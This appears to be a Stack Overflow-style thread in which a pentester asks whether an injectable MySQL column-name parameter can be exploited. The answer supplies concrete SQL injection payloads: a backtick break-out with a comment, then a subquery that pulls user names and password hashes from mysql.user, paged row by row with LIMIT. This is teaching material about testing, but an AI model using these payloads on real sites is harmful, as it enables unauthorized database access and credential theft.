# SQL injection vulnerable?

Tags: mysql, sql, sql-injection, code-injection, penetration-testing

So I've come across a little problem while pentesting.
I found that the page does allow for a dynamic sql column from this type of link:
http://example.xx/?l=**[this parameter allows for sql code injection]** into the query shown below

```
sel menu fail(?some sort of failure of selection message)

select `menu_id`, `lang_**[the injected code starts here]**` as lang, age, is_open from `utf8_menu` where `age` = 503 AND `is_active`=1 order by `order`
Unknown column 'lang_' in 'field list'
```

My problem is that I've tried countless manipulations and additions to the query and really cant seem to find a way to exploit this. Is it really safe from injections? Any help is appreciated.
Thanks :)

Comment: What happens if you inject a `\``?

Answer (score 3):

No. There's not enough information here to deem the code to be invulnerable to SQL Injection.

From the query, we see that the function executing it is expecting four columns to be returned, and we see the names of the columns. (That information gives us a big head start.)

We're not sure how picky the function is about the number of columns returned, the names and datatypes of the columns, the particular values. or the number of rows that are going to be fetched. (Maybe the function is only fetching one row.)

If we know the statement is of this form...

```
  SELECT `menu_id`
       , `lang_**[the injected code starts here]**` AS lang
       , age
       , is_open
    FROM `utf8_menu` 
   WHERE `age` = 503
     AND `is_active`=1
   ORDER BY `order`
```

Our first shot at getting SQL injected might be something like this:

```
  foo` AS lang, 1 AS age, 1 AS is_open --
```

If the string value is incorporated into the SQL with no modification, we'd get SQL of the form:

```
  SELECT `menu_id`
       , `lang_foo` AS lang
       , 1 AS age
       , 1 AS is_open -- ` AS lang ...
```

Everything that comes after the "dash dash space" will be treated as a comment. The function might balk at a column named `lang_foo`. If we're lucky, the function is referring to the columns by ordinal position (1,2,3,...) rather than by column name.

So, we might need to change "`foo`" to be some other value, something expected by the function.

If that exploit is successful, then it's a initial opening. We can try to expose some information.

We might be able to get some information out of the mysql.user table...

```
  SELECT `menu_id`
       , `lang_foo` AS lang
       , col3       AS `age`
       , 1          AS `is_open`
    FROM ( SELECT host     AS menu_id
                , user     AS lang_foo
                , password AS col3
             FROM mysql.user 
            ORDER BY host, user
         ) --  ...
```

It depends what the function is doing with the returned values; if it's putting that out to a web page, we're golden.

If the function is only returning a single row, it will take us a little more effort to get the whole mysql.user table.

We can slide in `LIMIT 0,1` the first time, the `LIMIT 1,1` to get the second row...